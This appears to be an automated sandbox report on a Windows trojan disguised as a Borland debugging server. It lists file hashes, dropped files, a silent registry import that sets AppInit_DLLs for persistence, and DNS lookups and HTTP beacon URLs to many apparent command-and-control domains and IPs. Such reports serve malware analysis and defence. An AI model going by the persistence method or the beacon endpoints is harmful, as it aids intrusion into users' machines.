Analysis Date2013-07-23 01:38:43
MD5724674e9c7c83d77d6de3d4004363f90
SHA114eaaddfe2b26b2ad6aa07f796badef09e7ae24d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: cbe78a03abdbd8845b3dc09b5fa37819 sha1: 381b620da6eb24d9df58664d40e9bd93415610fa size: 90112
Section_ASM2 md5: 076f230f10037cf1fd4590959af11728 sha1: 9ee6325e5b57750f899b0e3e0935e4b1420047db size: 62464
Section.rdata md5: 5be8eeb9fca386416f85ea22499ceea0 sha1: 727790a1b349b756866dec182b860ae1ac42c56c size: 7680
Section.data md5: 4f0f1c6cb3585963ac2e77e53fd7ec9f sha1: 11892fec92ea8d1796a05d195b14777e53d6e3d1 size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp2012-09-18 19:14:38
VersionLegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
PackerMicrosoft Visual C++ ?.?
PEhash96d5eb0902d5e1a03adc8ac7b1a6d8be8e91e4b8

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old WorkAreas\NoOfOldWorkAreas ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\ProgramsCache ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-000000000046}\Enum\Implementing ➝
NULL
RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\SysTray\Services ➝
31
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify\PastIconsStream ➝
NULL
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\vjncpni.dll
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates MutexShell.CMruPidlList
Winsock DNS91.233.89.106
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNSterrans.su
Winsock DNSnsknock.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSgleospond.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\vjncpni.dll\\x00

Network Details:

DNSgleospond.com
Type: A
91.220.35.154
DNSgetavodes.com
Type: A
91.220.35.154
DNStryatdns.com
Type: A
91.220.35.154
DNSinstrango.com
Type: A
62.116.143.13
DNSnetrovad.com
Type: A
192.74.240.52
DNSnsknock.com
Type: A
62.116.143.13
DNSfescheck.com
Type: A
DNSterrans.su
Type: A
DNStegimode.com
Type: A
DNSdenadb.com
Type: A
DNSforadns.com
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://gleospond.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jN3VkYFy+R/X
User-Agent:
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jHutw7EsXn59
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jCS1jrtODlAL
User-Agent:
HTTP GEThttp://instrango.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jPh1rvcuvsaB
User-Agent:
HTTP GEThttp://netrovad.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jIXNgZIeRTi2
User-Agent:
HTTP GEThttp://nsknock.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jCy7MU3v5G/h
User-Agent:
HTTP GEThttp://91.233.89.106/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jJKgo+NkKZki
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 91.220.35.154:80
Flows TCP192.168.1.1:1032 ➝ 91.220.35.154:80
Flows TCP192.168.1.1:1033 ➝ 91.220.35.154:80
Flows TCP192.168.1.1:1034 ➝ 62.116.143.13:80
Flows TCP192.168.1.1:1035 ➝ 192.74.240.52:80
Flows TCP192.168.1.1:1036 ➝ 62.116.143.13:80
Flows TCP192.168.1.1:1037 ➝ 91.233.89.106:80

Raw Pcap

Strings